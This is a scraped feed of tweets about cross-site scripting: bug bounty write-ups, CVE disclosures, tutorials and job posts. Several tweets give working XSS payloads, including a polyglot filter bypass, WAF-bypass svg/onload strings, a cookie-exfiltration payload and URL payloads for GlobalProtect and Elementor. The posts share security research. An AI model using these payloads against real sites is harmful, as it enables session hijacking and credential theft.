@CyberIQs_2 years agoReflected XSS Leads to 3,000$ Bug Bounty Rewards from Microsoft Forms #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1364087716934078466/zRX1e_Bj_normal.jpg)
🇮🇳 ! Bõt âmît
@Botami1432 years agoCRLF Injection to XSS #bugbountytips #BugBounty #bugbountytip #cybersecuritytips #cybersecurity #hacker #Hacking https://t.co/umuXV9fTdW
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatoris2 years agoCross site scripting and the use of http-only cookies? - Visit https://t.co/E0jEgfOFhh for the answer. #xss #attack_vector #infosec #developers #developerlife
![profile](https://pbs.twimg.com/profile_images/1552259034035941376/Bo8EZfW-_normal.png)
Bhavesh Harmalkar 🇮🇳
@bhavesharmalkar2 years ago#Learn365 Day 22: Read random blogs 1. Learn to build it, then break it 2. Reflected XSS Leads to 3,000$ 3. How I found XSS on Admin Page without login! 4. Critical bug on google by get full access on [Google Cloud BI Hackathon] (1/n) #cybersecurity #BugBounty
![profile](https://pbs.twimg.com/profile_images/1596188881535533056/mLqZh1Vm_normal.jpg)
iris
@IrisTech_2 years ago108/365 Finished OWASP Top 10 room on TryHackMe. XSS Payloads are fun 🤭 #100DaysOfHacking #365DaysOfHacking #womenintech #cybersecurity #infosec #womenintech #TechTwitter
![profile](https://pbs.twimg.com/profile_images/1610626347709112321/XFrREd5N_normal.jpg)
Goziem
@g0ziem2 years agoHow can I use Nuclei to find xss bug #BugBounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1169067340828250113/02WuFDki_normal.jpg)
My Space!
@Supakiad_Mee2 years agoI'm excited to share my latest write-up about vulnerability found on the Microsoft Security Response Center bug bounty program, which highlights the vulnerabilities I discovered and the rewards received. https://t.co/yCf49p3bK0 #bugbounty #cybersecurity #MSRC #ethicalhacking
![profile](https://pbs.twimg.com/profile_images/1615287258680070146/Tg26M-Zt_normal.jpg)
Constantin Mic
@ConstantinMic2 years agoThis polyglot XSS payload can still bypass to many filters: jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e #bugbountytips #cybersecurity #it
![profile](https://pbs.twimg.com/profile_images/1406037441975365632/9k55bIyk_normal.jpg)
VassBot
@vassbot2 years ago@hackuu_ you can Hey everyone! @Vassbot is the best when it comes to protecting your #WordPress site from Cross Site Scripting (XSS) vulnerabilities in Conversational Forms for ChatBot <= 1.1.6. Protect your website, trust the experts. #cybersecurity #hacking
![profile](https://pbs.twimg.com/profile_images/1600705047301586944/uNoJXpfG_normal.jpg)
Fares Walid
@SirBagoza2 years agoI have published my first write-up 🤭About: Using CSRF + XSS to account takeover 🥰🥰 https://t.co/iik0DrrPKT #BugBounty #bugbountytips #Hacking https://t.co/KeQiJCsq0b
![profile](https://pbs.twimg.com/profile_images/1364087716934078466/zRX1e_Bj_normal.jpg)
🇮🇳 ! Bõt âmît
@Botami1432 years agoFind hidden GET parameters in javascript files #bugbountytips #BugBounty #bugbountytip #xss #cybersecuritytips #cybersecurity #sqlinjection #hacker #Hacking https://t.co/9EXrPGpdOO
![profile](https://pbs.twimg.com/profile_images/1106570929352658944/ixbVu7JG_normal.png)
terjanq
@terjanq2 years ago@irsdl @infosec_au Yeah. I did pwn a few cases where XSS was only on login page. The easiest is to open one window with auth content, do csrf-logout, open xss and read sensitive info from auth window (:
![profile](https://pbs.twimg.com/profile_images/1604736569083973632/lPu9htJ5_normal.jpg)
InfoSec Ninja 🇮🇳
@InfosecMonk2 years agoI completed the Web Security Academy lab: Reflected XSS into HTML context with nothing encoded: <script>alert(1)</script> @WebSecAcademy #xss #bugbounty #webappsec https://t.co/Sfs9LPgaEL
![profile](https://pbs.twimg.com/profile_images/1551404378711793664/oW_81tga_normal.jpg)
at once
@atonce112206042 years agoCalling all curious minds! Check out my latest Medium article on "Uncovering a Reflected XSS on a Public Bug Bounty Program" by clicking the link below. https://t.co/olEg7KFnSE Follow for more engaging content. #medium #article #community #BugBounty #xss #bugcrowd
![profile](https://pbs.twimg.com/profile_images/1610626347709112321/XFrREd5N_normal.jpg)
Goziem
@g0ziem2 years agoHow do I find xss using Nuclei? @pdnuclei #BugBounty #infosec #bugbountytips #xss #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1617019243794501637/5oF-ci6F_normal.jpg)
Drugs Hack
@DrugsHack2 years agoAwesome #XSS https://t.co/FAccSSEzi8… #bugbounty #bugbountytips #cybersecurity https://t.co/P8k3SxO6Fd
![profile](https://pbs.twimg.com/profile_images/1568926750557540357/ZmtGuxe-_normal.jpg)
mnkeni francis
@MnkeniFrancis2 years agoronin-rb/ronin-vulns: Tests URLs for Local File Inclusion (LFI), Remote File Inclusion (RFI), SQL injection (SQLi), and Cross Site Scripting (XSS), Server Side Template In... #Cybersecurity #infosec #security via https://t.co/olBiC9iZIh https://t.co/LGoia3OJ38
![profile](https://pbs.twimg.com/profile_images/1420213645900881924/rm9-MCbG_normal.png)
Hot10Security
@Hot10Security2 years agoPopular keywords used with #vulnerability tweets Date: 2023-01-21 Unique Tweets: 173 TOP 10 KEYWORDS 1: Cross 2: Site 3: Vigil 4: Scripting 5: XSS 6: Request 7: Forgery 8: CSRF 9: Vulnerability 10: RCE bot-tweet #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1344962042973794304/93BZHi0l_normal.jpg)
iSecurity
@iSecurity2 years agoWhat is cross-site scripting (XSS)? Web App Pen-testing https://t.co/yWBHulTC01 #cybersecurity #bugbounty #xssattack
![profile](https://pbs.twimg.com/profile_images/1106570929352658944/ixbVu7JG_normal.png)
terjanq
@terjanq2 years ago@irsdl @infosec_au You can steal credentials stored in a password manager in both scenarios. There are also a few tricks that let you "unauthenticate" a user for a moment, and then after XSS re-authenticate them.
![profile](https://pbs.twimg.com/profile_images/1534581085212131329/qKF_k5_i_normal.jpg)
Stalwart
@the_unswerving2 years agoXSS Powerful Methodology for Beginners #Infosec via https://t.co/yNOfVDx5DP https://t.co/XTKnCK4ZZj
![profile](https://pbs.twimg.com/profile_images/1513406849827188741/iHJzoru__normal.png)
Anton
@therceman2 years ago@infosec_au Or injecting custom payloads into local storage… and if there is a flaw in reflection on client-side can be used to achieve Stored-XSS too. So pre-auth XSS is bad, especially if you can find a way how to turn it into Stored XSS later.
![profile](https://pbs.twimg.com/profile_images/1513406849827188741/iHJzoru__normal.png)
Anton
@therceman2 years ago@infosec_au I believe that pre-auth XSS can be used for injecting custom cookies that later in some cases can be used to achieve Stored-XSS for auth users
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSec2 years agoXSS Methodology for Beginners full :⚔️🛡️ https://t.co/oFQ3ua4aaF #infosec #cybersec #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSec2 years agoGlobalProtect XSS https://globalprotect/global-protect/login.esp?user=j%22;-alert(1)-%22x #infosecurity #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSec2 years agoYou can bypass a WAF during a XSS attack on ASP(dot)NET-IIS technology by using a HTTP parameter pollution attack #infosecurity #bugbountytips https://t.co/9NoUy2CuEB
![profile](https://pbs.twimg.com/profile_images/1356492237220294657/yOpun9t3_normal.jpg)
CYBER4ALL
@cyber_4all · 2 years ago · Basic Linux Commands #linux #unix #terminal #commands #files #network #processes #compression #permissions #cyberattacks #cybersecurity #dataprivacy #infosec #malware #blueteam #Soc #phishing #xss #malicious_insiders #forensic #cyber4all #c4a #ethicalhacking #learning4all https://t.co/Ahb6PWpznk
![profile](https://pbs.twimg.com/profile_images/1159451801361534981/LLzq3yBl_normal.jpg)
Ricardo Iramar
@ricardo_iramar · 2 years ago · @irsdl @infosec_au IMO cannot be compared with self-xss. Imagine a user receives a link from a valid domain with an encoded payload and it opens in a browser. The login page appears and the user provides the credentials. The xss payload sends the credentials directly to an attacker.
![profile](https://pbs.twimg.com/profile_images/1507871051107155974/H5ReuvZ6_normal.jpg)
Soroush Dalili 🗹
@irsdl · 2 years ago · @infosec_au Safe to say it is similar to self xss when it is unauth? or you think it can be worse? Obviously it is worse when user is authenticated
![profile](https://pbs.twimg.com/profile_images/1507871051107155974/H5ReuvZ6_normal.jpg)
Soroush Dalili 🗹
@irsdl · 2 years ago · @infosec_au I normally don’t think about pre or post auth when it comes to xss unless it is stored. You made me think 🤔
![profile](https://pbs.twimg.com/profile_images/1550997937223770112/Vuwd45Jf_normal.png)
Bug bounty notes
@bugbounty0 · 2 years ago · I Hope This Sticks: Analyzing ClipboardEvent Listeners for Stored XSS #bugbounty #bugbountytip #infosec #bugbountytips https://t.co/7labBhSn6r
![profile](https://pbs.twimg.com/profile_images/1550997937223770112/Vuwd45Jf_normal.png)
Bug bounty notes
@bugbounty0 · 2 years ago · How I was able to steal users credentials via Swagger UI DOM-XSS #bugbounty #bugbountytip #infosec #bugbountytips https://t.co/djTJmmaNoB
![profile](https://pbs.twimg.com/profile_images/1550997937223770112/Vuwd45Jf_normal.png)
Bug bounty notes
@bugbounty0 · 2 years ago · CVE-2022–42710: A journey through XXE to Stored-XSS #bugbounty #bugbountytip #infosec #bugbountytips https://t.co/kyYNklvFwz
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatoris · 2 years ago · Xssing without opening a new html tag < - Visit https://t.co/9snA7cDqGS for the solution. #web_application #xss #infosec #tech #engineering
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatoris · 2 years ago · jQuery $.get HTML code and XSS - Visit https://t.co/VqKDI1pgX6 for the solution. #xss #ajax #jquery #infosec #peoplewhocode
![profile](https://pbs.twimg.com/profile_images/1467418634398015496/uP3n8IB1_normal.jpg)
SentientJohnny
@SentientJohnny · 2 years ago · Change one's name in a certain, sacred way to perform an XSS attack on the Book of Life; hacking universalism into existence, or banning specific targets from Heaven.
![profile](https://pbs.twimg.com/profile_images/1601664448925556736/xFqeWsSg_normal.jpg)
Mike Takahashi
@TakSec · 2 years ago · XSS Cookie Exfil by voiddy Payload w/ confirm: "/></div><div/OnpOinTeReNter=eval&lpar;"var&nbsp;u='nt.c'.concat('ook'.concat('ie'));confirm&lpar;eval&lpar;'do'.concat('cume'.concat(u))&rpar;&rpar;"&rpar;>click here<input type="hidden=alert https://t.co/PJRNsCWjFL #bugbounty
![profile](https://pbs.twimg.com/profile_images/1089185605911752705/e8j99QcU_normal.jpg)
infosec-jobs.com
@infosec_jobsCOM · 2 years ago · HIRING: Senior CERT Analyst / Incident Responder (M/F) / Sèvres, France https://t.co/IsMfrD6a7L #InfoSec #InfoSecJobs #Cybersecurity #jobsearch #hiringnow #CyberCareers #Sèvres #France #ActiveDirectory #C #CISSP #Cloud #DDoS #EDR #Forensics #GCFA #GCIH #GIAC #Linux #XSS
![profile](https://pbs.twimg.com/profile_images/1372763198986756100/mvwLpH_M_normal.jpg)
Priyanshu Sahay
@priyanshu_itech · 2 years ago · How To Do CSRF Exploitation By Using Stored XSS Vulnerability – #TUTORIAL [Video] https://t.co/cbmZOolVKl #penetrationtesting #infosec #security #hackersonlineclub #cybersecurity
![profile](https://pbs.twimg.com/profile_images/627732999161823232/QF5met-h_normal.jpg)
Hackers Online Club (HOC)
@HOCupdate · 2 years ago · How To Do CSRF Exploitation By Using Stored XSS Vulnerability – #TUTORIAL [Video] https://t.co/ApsPZ0W1AH #penetrationtesting #infosec #security #hackersonlineclub #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks · 2 years ago · (CVE-2023-0338): Cross-site Scripting (XSS) - Reflected in lirantal/daloradius. https://t.co/Od0ApQg1D7 Disclosed by https://t.co/E1qF4lGgfX, fixed by @filippolauria... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks · 2 years ago · (CVE-2023-0337): Cross-site Scripting (XSS) - Reflected in lirantal/daloradius. https://t.co/JqMD4xSZdl Disclosed by https://t.co/E1qF4lGO5v, fixed by @filippolauria... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/914907986568638466/j6ZJi9cC_normal.jpg)
LinuxSecurity
@lnxsec · 2 years ago · Want to scan for XSS vulns in websites/web apps?🔓 Then look no further than Pwn XSS, a powerful tool used by malicious hackers & security professionals alike. Learn how to install & run Pwn XSS👇👇 https://t.co/Lf8DN6ChTe Given it a try? What do you think?🤔 #linux #infosec
![profile](https://pbs.twimg.com/profile_images/1455872947953049602/87xmzeuM_normal.jpg)
saad alhrby
@LazySaad · 2 years ago · I found this bug https://t.co/cjTtRl5eUo in a website but the XSS didn't trigger. Is it worth reporting or should I leave it? BTW it loads the source from https://t.co/i45lbZv9wR ... ... #bugbounty
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatoris · 2 years ago · How to ensure that files uploaded by users do not contain any XSS code - Visit https://t.co/aFlWAx0jEa for the answer. #javascript #xss #threat_mitigation #infosec #programming
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatoris · 2 years ago · Newline XSS vulnerability - Visit https://t.co/CZ0xU8Yfrt for the solution. #javascript #xss #infosec #programmer #developer
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatoris · 2 years ago · Script tag loading "https://t.co/uHBy5hANKh" in e-commerce transaction data - real attack or something else? - Visit https://t.co/SS3savhjv5 for the answer. #attacks #xss #javascript #e_commerce #infosec
![profile](https://pbs.twimg.com/profile_images/1475684641621397511/cfuVbh5A_normal.jpg)
Glênnio
@iGlennio · 2 years ago · I found a stored XSS in Rede Globo's SIS. The attack was identified and fixed in 30 minutes. But unfortunately for the team, because of the delay I am 3 steps ahead. #hacking #Pentesting #XSS #GloboNews #GloboNewsEmPonto #RedeBBB #RedeGlobo #CyberSecurityAwareness #BugBounty https://t.co/MISHpz4t5S
![profile](https://pbs.twimg.com/profile_images/1410323546165833728/NuguMAm2_normal.jpg)
fletch
@fletch_ai · 2 years ago · Fletch Top Threat Alert: Vulnerability Spotlight: XSS vulnerability in Ghost CMS - #CVE-2022-47194 #FletchScore = Medium/Emerging #CyberSecurity #ThreatIntel #InfoSec CVE-2022-47197 CVE-2022-47195 CVE-2022-47194 CVE-2022-47196 https://t.co/K9gQv9obyb
![profile](https://pbs.twimg.com/profile_images/1420213645900881924/rm9-MCbG_normal.png)
Hot10Security
@Hot10Security · 2 years ago · Popular keywords used with #vulnerability tweets Date: 2023-01-19 Unique Tweets: 410 TOP 10 KEYWORDS 1: Azure 2: MainWP 3: Extension 4: Cross 5: Site 6: Scripting 7: CVE 8: XSS 9: RCE 10: Vigil bot-tweet #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Disclosed · 2 years ago · ⚡ Cookie exfiltration through XSS on the main search request of https://t.co/YmCo3V0SPU 👨💻 voiddy ➟ LocalTapiola 🟧 Medium 💰 $500.0 https://t.co/m3XCQvXP8c #bugbounty #bugbountytips #cybersecurity https://t.co/UQQvWqojN7
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_ · 2 years ago · Vulnerability Spotlight: XSS vulnerability in Ghost CMS #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1543963505048551428/2zOk38wP_normal.jpg)
ӉѦСҠіИԌ ҬЄѦӍ ԌГԱթѺ ѺҒіСіѦL
@HackingTeam1 · 2 years ago · XSS/WAF/SQL filter bypass. < - %EF%BC%9C (\uff1c) > - %EF%BC%9E (\uff1e) \ - %EF%BC%BC (\uff3c) / - %EF%BC%8F (\uff0f) ' - %EF%BC%87 (\uff07) " - %EF%BC%82 (\uff02) #bypass #xss #waf #sql 💻Cybersecurity and Hacking Community 💻
![profile](https://pbs.twimg.com/profile_images/1601664448925556736/xFqeWsSg_normal.jpg)
Mike Takahashi
@TakSec · 2 years ago · XSSHunter Discord Notifications by @AdamJSturge https://t.co/MmDY3oOLmk #bugbountytips #bugbounty #infosec #hacking #xss
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks · 2 years ago · (CVE-2023-0323): Cross-site Scripting (XSS) - Stored in pimcore/pimcore. https://t.co/tSa4CJILd7 Disclosed by https://t.co/6dCOfMLYmV, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/914907986568638466/j6ZJi9cC_normal.jpg)
LinuxSecurity
@lnxsec · 2 years ago · Want to scan for XSS vulns in websites/web apps?🔓 Then look no further than Pwn XSS, a powerful tool used by malicious hackers & security professionals alike. Learn how to install & run Pwn XSS👇👇 https://t.co/Lf8DN6BK3G Given it a try? What do you think?🤔 #linux #infosec https://t.co/Z76TgsA2MW
![profile](https://pbs.twimg.com/profile_images/1610577090625273856/SRCw6oSh_normal.jpg)
Nithin 🦹♂️
@thebinarybot · 2 years ago · Name a concept in bug bounty you want me to write a detailed article on. Expecting something like IDOR, BAC etc. PS: Anything except XSS please 🙈 #bugbounty
![profile](https://pbs.twimg.com/profile_images/1604749570675810307/oI5mldCt_normal.jpg)
Mahmoud Abd Alkarim
@Maakthon · 2 years ago · #htmlspecialchars() function in PHP only encodes ASCII characters. #XSS #bypass #bugbountytips #BugBounty #html #php #javascript #hacking https://t.co/NreVNzG99x
![profile](https://pbs.twimg.com/profile_images/1604507985690009602/mHjZ5TMJ_normal.jpg)
Adam J Sturge
@AdamJSturge · 2 years ago · I added Discord to XSSHunter and wrote an article about how to set it up https://t.co/nzTPPJB6Wh #infosecurity #infosec #bugbountytips #Pentesting #Security #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1582056005055090688/HqkAmXuB_normal.jpg)
NetFiT.eth
@OnNetFiT · 2 years ago · An xss payload for a VueJS based application: {{_Vue.h.constructor`alert(1)`()}} {{$emit.constructor`alert(1)`()}} #BugBounty #bugbountytips #infosec #CyberSec
![profile](https://pbs.twimg.com/profile_images/1420213645900881924/rm9-MCbG_normal.png)
Hot10Security
@Hot10Security · 2 years ago · Popular keywords used with #vulnerability tweets Date: 2023-01-18 Unique Tweets: 348 TOP 10 KEYWORDS 1: CVE 2: Scripting 3: XSS 4: Attacks 5: Git 6: Vulnerabilities 7: Injection 8: Data 9: Vulnerability 10: Cloud bot-tweet #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks · 2 years ago · (CVE-2023-0314): Cross-site Scripting (XSS) - Reflected in thorsten/phpmyfaq. https://t.co/lT0gndGcBK Disclosed by @aggressiveusers, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks · 2 years ago · (CVE-2023-0313): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/rlmWPGlbZt Disclosed by https://t.co/jYCFhLpreW, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks · 2 years ago · (CVE-2023-0312): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/JgA0kkLtS5 Disclosed by https://t.co/CO1HKk5eFz, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks · 2 years ago · (CVE-2023-0310): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/49QPeEgxfW Disclosed by https://t.co/CO1HKk5eFz, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks · 2 years ago · (CVE-2023-0309): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/SiIrXmJ8dT Disclosed by https://t.co/CO1HKk5eFz, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks · 2 years ago · (CVE-2023-0308): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/fTIKyrhLuE Disclosed by https://t.co/CO1HKk5eFz, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks · 2 years ago · (CVE-2023-0306): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/sbYdhQdGdo Disclosed by https://t.co/IJVlWK9pbV, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1371589267252776962/8_4YSfPn_normal.jpg)
Alonso Caballero
@Alonso_ReYDeS · 2 years ago · The video of the free webinar "Cross-Site Scripting (XSS)" is available. #cybersecurity #hacking #readteam #bugbounty #forensics #osint 🎯 https://t.co/QU6ghIwHeR https://t.co/bjJyidjuRb
![profile](https://pbs.twimg.com/profile_images/1399730689097015304/8mHPiNyi_normal.jpg)
Gokul A.P
@CodingGokul · 2 years ago · Hey Guys, I have been rewarded with a P2 reward! [+] Severity : P2 [+] Bug : XSS in Jira [+] Bounty : $400 Try to check for all the old CVEs when you find a Jira instance! #bugbounty #pentesting #webpentesting #cybersecurity #hackerone #bugbountytips https://t.co/5aRznpSw24
![profile](https://pbs.twimg.com/profile_images/1607061228819566593/ZuWM23vz_normal.jpg)
Nik H
@Nikahverse · 2 years ago · XSS mindmap =) https://t.co/EUrRhy0WYI #xss #mindmap #bugbounty #bugbountytips #cybersecuritytips #CyberSec https://t.co/sz6pZcb4fx
![profile](https://pbs.twimg.com/profile_images/1356492237220294657/yOpun9t3_normal.jpg)
CYBER4ALL
@cyber_4all · 2 years ago · Cybersecurity Attack Vectors #cyberattacks #cybersecurity #dataprivacy #infosec #malware #blueteam #Soc #phishing #xss #mitm #ransomware #SQLinjection #malicious_insiders #forensic #incidentresponse #cyber4all #c4a #ethicalhacking #learning4all https://t.co/G2c7znMeZh
![profile](https://pbs.twimg.com/profile_images/1554826316695814144/Qp97e98R_normal.jpg)
Anonymous H4ck3r
@AnonymousH4ck35 · 2 years ago · Some ModSecurity WAF bypass xss payload list:👇 🔥👇 #infosec #AppSec <svg/onload=eval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ==’))> <svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))> <svg onload='new Function`[“_Y000!_”].find(al\u0065rt)`'>
![profile](https://pbs.twimg.com/profile_images/1601541091635101696/UK-n3GXU_normal.jpg)
Willie Birch
@btcwin_ · 2 years ago · XSS "403 forbidden" bypass write up #Cybersecurity #infosec #security via https://t.co/CCtqTjT3f6 https://t.co/97MmlOSANg
![profile](https://pbs.twimg.com/profile_images/1569303471001575426/ENwsPzVm_normal.jpg)
RedTeam Pentesting
@RedTeamPT · 2 years ago · 🚨🚨🚨 A critical vulnerability in Skyhigh Security's Secure Web Gateway has been fixed 🔥 https://t.co/DIP5rmu4js Make sure to update 🩹 Details will follow soon! #patchday #infosec #xss
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Disclosed · 2 years ago · ⚡ DOM XSS at `https://t.co/toWqmx06j8{site}` due to outdated Swagger UI 👨💻 @i_eh_dreamer ➟ Adobe 🟧 Medium 💰 N/A https://t.co/ctyHLhYG5f #bugbounty #bugbountytips #cybersecurity https://t.co/vzC4LaTIpT
![profile](https://pbs.twimg.com/profile_images/1242982896211652609/JHYwg95l_normal.jpg)
spyx
@spyx_myky · 2 years ago · WordPress Elementor DOM XSS still up there. CVE-2022-29455. Payload for "xss" pop up: https://site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg= #bugbountytip #bugbountytips https://t.co/fBbChseq0v
![profile](https://pbs.twimg.com/profile_images/1603354063772733440/FdOB51BT_normal.jpg)
Decode Decrypt
@DecodeDecrypt · 2 years ago · XSS "403 forbidden" bypass write up #Cybersecurity #infosec #security via https://t.co/a2QDS692i1 https://t.co/KDYA1dyOW9
![profile](https://pbs.twimg.com/profile_images/1607002355244875776/mkEg80g5_normal.jpg)
Banking and Fintech News
@StanleyEpstein · 2 years ago · XSS "403 forbidden" bypass write up #Cybersecurity #infosec #security via https://t.co/eBW8Lmmpx7 https://t.co/TT7vD44Y9r